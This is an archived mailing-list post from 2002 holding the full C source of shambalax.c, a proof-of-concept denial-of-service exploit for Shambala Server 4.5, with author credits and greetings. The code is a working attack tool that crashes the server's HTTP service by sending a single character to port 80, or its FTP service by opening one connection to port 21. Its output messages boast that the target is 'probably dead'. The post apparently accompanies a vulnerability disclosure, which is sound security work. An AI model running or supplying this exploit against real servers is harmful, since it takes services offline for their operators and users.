DoS exploit for previously discussed issues in Shambala Server 4.5. -- /*********************************** * Daniel Nyström, Telhack 026 Inc. * ***********************************/ http://www.SweSec.tk http://www.telhack.tk /******** shambalax.c *********************************************************** * * * PoC exploit for the DoS in Shambala Server 4.5 * * as described in Telhack 026 Inc. S.A. #3 (BID:4897). * * I have also built in a function that exploits another * * DoS condition found by zillion a long long time ago. * * Also refined my DoS a little bit by just using one * * char that mess up Shambala. * * * * By: Daniel Nyström (excE) <exceat_private> * * * * * * Notes: * * I found that zillion had only been almost right, it * * is not opening a lot of TCP connection that generates * * the DoS that he found, it is just one TCP connection, * * but it certainly has to do with bad connection handling * * by Shambala. * * * * * * * * Credits: * * Zillion <zillionat_private> - for discovering the FTP DoS * * * * Greetz: * * Xenogen <*****@**********.***> - for promising to report any segfaults :) * * X-Rewt <*****@**********.***> - Cuz he's in my school :P * * Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :)) * * * *********************************************************** shambalax.c ********/ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h> int main(int argc, char *argv[]) { int sockfd; int port; int numbytes; struct sockaddr_in target; struct hostent *he; if (argc != 3) { fprintf(stderr, "\n-- Shambala Server 4.5 DoS exploit --\n"); fprintf(stderr, "\nUsage: %s <target> <type>", argv[0]); fprintf(stderr, "\nTypes:"); fprintf(stderr, "\n1 - HTTPD DoS"); fprintf(stderr, "\n2 - FTP DoS\n\n"); exit(1); } printf("\n-- Shambala Server 4.5 DoS exploit --\n\n"); printf("-> Starting...\n"); printf("->\n"); if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(1); } if ((sockfd=socket(AF_INET, SOCK_STREAM,0)) == -1) { perror("socket"); exit(1); } /* HTTPD DoS */ if(argv[2][0] == '1') { port = 80; target.sin_family = AF_INET; target.sin_port = htons(port); target.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(target.sin_zero), 8); printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr)); printf("->\n"); if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1) { perror("connect"); exit(1); } printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n"); printf("->\n"); if(send(sockfd, "!\r\n", 3, 0) == -1) { perror("send"); exit(1); } close(sockfd); } else /* FTPD DoS */ if(argv[2][0] == '2') { port = 21; target.sin_family = AF_INET; target.sin_port = htons(port); target.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(target.sin_zero), 8); printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n", inet_ntoa(target.sin_addr)); printf("->\n"); if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1) { perror("connect"); exit(1); } close(sockfd); } else { fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n"); exit(1); } printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n", argv[1]); } /* EOF - Shambala Server 4.5 DoS exploit */ /* Daniel Nyström (excE) <exceat_private> */
This archive was generated by hypermail 2b30 : Tue Jul 09 2002 - 11:10:42 PDT